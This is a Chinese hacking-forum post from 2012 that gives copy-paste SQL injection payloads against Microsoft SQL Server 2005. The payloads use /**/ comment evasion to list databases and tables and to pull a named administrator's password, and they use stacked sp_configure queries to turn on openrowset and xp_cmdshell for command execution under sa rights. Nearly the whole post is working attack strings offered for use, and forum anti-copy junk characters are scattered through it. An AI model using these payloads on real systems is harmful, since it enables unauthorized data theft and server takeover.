找回密码
 立即注册
查看: 3075|回复: 0
打印 上一主题 下一主题

MSsql2005注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:19:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
% q  @( y9 o6 _& h. x$ ^8 c0 S
3 t2 Y, V0 F$ w  E- J7 ?
. Y3 r6 L7 G- M, {# R6 }5 E% H
[Copy to clipboard]CODE:
" b! `) Z9 t# T/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--; A( ]/ y7 F9 v
& E  L5 F; h# Z( d  D! @6 M5 _
爆表语句,somedb部份是所要列的数据库,红色数字1累加" q  D9 g2 u9 x/ ~* N

) g7 _1 U: q( S3 ^( z; l  ~) U; H( G  t- }4 k( ~
[Copy to clipboard]CODE:
- X5 L+ s/ I+ L5 m$ o& P/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
; y; e+ s" Z" r( \" P. F! T2 f' F( r7 k" x2 i
爆字段语句,爆表admin里user='icerover'的密码段
* E( l: g% e* Q! k: N
- q+ S+ f8 ?' A. C  g& N- Z# M
0 u* A- Y2 Q9 }4 R' j[Copy to clipboard]CODE:
& p# W: f2 l- U' f1 T8 s**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
4 x) M" \1 a2 t: e2 L& v6 L' ~2 p) n; x" T8 k' ^
mssql2005默认没有开xp_cmdshell的,openrowset也不能用
# ^. }0 q' ?( M- e) j# c如果是sa权限,可以这样来开启
9 E( C4 u, b. Z3 O" N( f开启openrowset( O! \$ k& t* C2 P+ L" w

( M+ @7 m# h$ y5 o* L$ X
2 W6 N  c- P* E+ ]. u5 x, t" \[Copy to clipboard]CODE:- Y" |" h! Q: p0 ]3 f4 I9 B. C4 A
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--+ P# M' u! ?& R. z. [& X) R9 q: `
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
  ]! g& j; z$ W4 y' u+ |
6 u7 N' h- ]( |6 `( `开启xp_cmdshell/ ]9 T1 A, {: G4 S  @; v

6 A  q1 |9 C, R* v
' T! a9 R9 Q: f" L) F[Copy to clipboard]CODE:- m' Q- K; \) q) S% @
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
% S  X* s6 l$ E, N# hEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
  Z- f7 G% ~8 V) n4 V2 E6 E! D! n& a5 o: y% d; O7 y* O) N" L1 y& |
ok,over~~晚安/ f1 P) Q1 ?7 `. k
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表